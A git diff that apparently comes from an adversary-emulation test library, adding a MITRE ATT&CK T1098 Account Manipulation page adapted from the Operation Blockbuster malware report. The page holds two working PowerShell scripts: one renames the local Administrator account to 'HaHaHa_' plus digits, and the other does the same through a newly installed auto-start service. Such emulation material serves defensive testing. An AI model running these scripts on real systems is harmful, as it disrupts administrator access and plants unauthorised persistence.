diff --git a/ARTifacts/Chain_Reactions/chain_reaction_02.bat b/ARTifacts/Chain_Reactions/chain_reaction_Fission.bat similarity index 100% rename from ARTifacts/Chain_Reactions/chain_reaction_02.bat rename to ARTifacts/Chain_Reactions/chain_reaction_Fission.bat diff --git a/ARTifacts/Chain_Reactions/chain_reaction_01.bat b/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat similarity index 100% rename from ARTifacts/Chain_Reactions/chain_reaction_01.bat rename to ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat diff --git a/Windows/Credential_Access/Account_Manipulation.md b/Windows/Credential_Access/Account_Manipulation.md new file mode 100644 index 00000000..98dffc9c --- /dev/null +++ b/Windows/Credential_Access/Account_Manipulation.md @@ -0,0 +1,62 @@ +# Account Manipulation + +MITRE ATT&CK Technique: [T1098](https://attack.mitre.org/wiki/Technique/T1098) + +Adapted from [Operation Blockbuster](https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf) + +## Example 1 + +If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 16 digits. + + $x = Get-Random -Minimum 2 -Maximum 9999 + $y = Get-Random -Minimum 2 -Maximum 9999 + $z = Get-Random -Minimum 2 -Maximum 9999 + $w = Get-Random -Minimum 2 -Maximum 9999 + Write-Host HaHaHa_$x$y$z$w + + $hostname = (Get-CIMInstance CIM_ComputerSystem).Name + + $fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name + + foreach($member in $fmm) { + if($member -like "*Administrator*") { + Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w" + Write-Host "Successfully Renamed Administrator Account on" $hostname + } + } + +## Example 2 + +If successful, the Administrator account will be renamed with `HaHaHa_` followed by 4 to 8 digits. + + $x = Get-Random -Minimum 2 -Maximum 99 + $y = Get-Random -Minimum 2 -Maximum 99 + $z = Get-Random -Minimum 2 -Maximum 99 + $w = Get-Random -Minimum 2 -Maximum 99 + $newadmin = "HaHaHa_$x$y$z$w".ToString() + + $serviceName = "Rename Account Service" + $serviceDisplayName = "Rename Account Service" + $serviceDescription = "Rename Account Service" + $serviceExecutable = "wmic useraccount where name='Administrator' rename '$newadmin'" + + if (Get-Service $serviceName -ErrorAction SilentlyContinue) + { + $serviceToRemove = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" + $serviceToRemove | Stop-Service + $serviceToRemove.delete() + } + else + { + "service does not exists" + } + + Write-Host "Installing service: $serviceName" + New-Service -name $serviceName -displayName $serviceDisplayName -binaryPathName $serviceExecutable -startupType Automatic -Description $serviceDescription + Write-Host "Installation completed: $serviceName" + + Write-Host "Trying to start new service: $serviceName" + + $serviceToStart = Get-WmiObject -Class Win32_Service -Filter "name='$serviceName'" + $serviceToStart.startservice() + Write-Host "Service started: $serviceName" diff --git a/Windows/README.md b/Windows/README.md index 10ecdf59..35762144 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -2,7 +2,7 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | +| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | [Account Manipulation](/Credential_Access/Account_Manipulation.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | [Audio Capture](Collection/Audio_Capture.md) | Automated Exfiltration | Commonly Used Port | | [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | | [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | [Clipboard Data](Collection/Clipboard_Data.md) | Data Encrypted | Connection Proxy | | Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |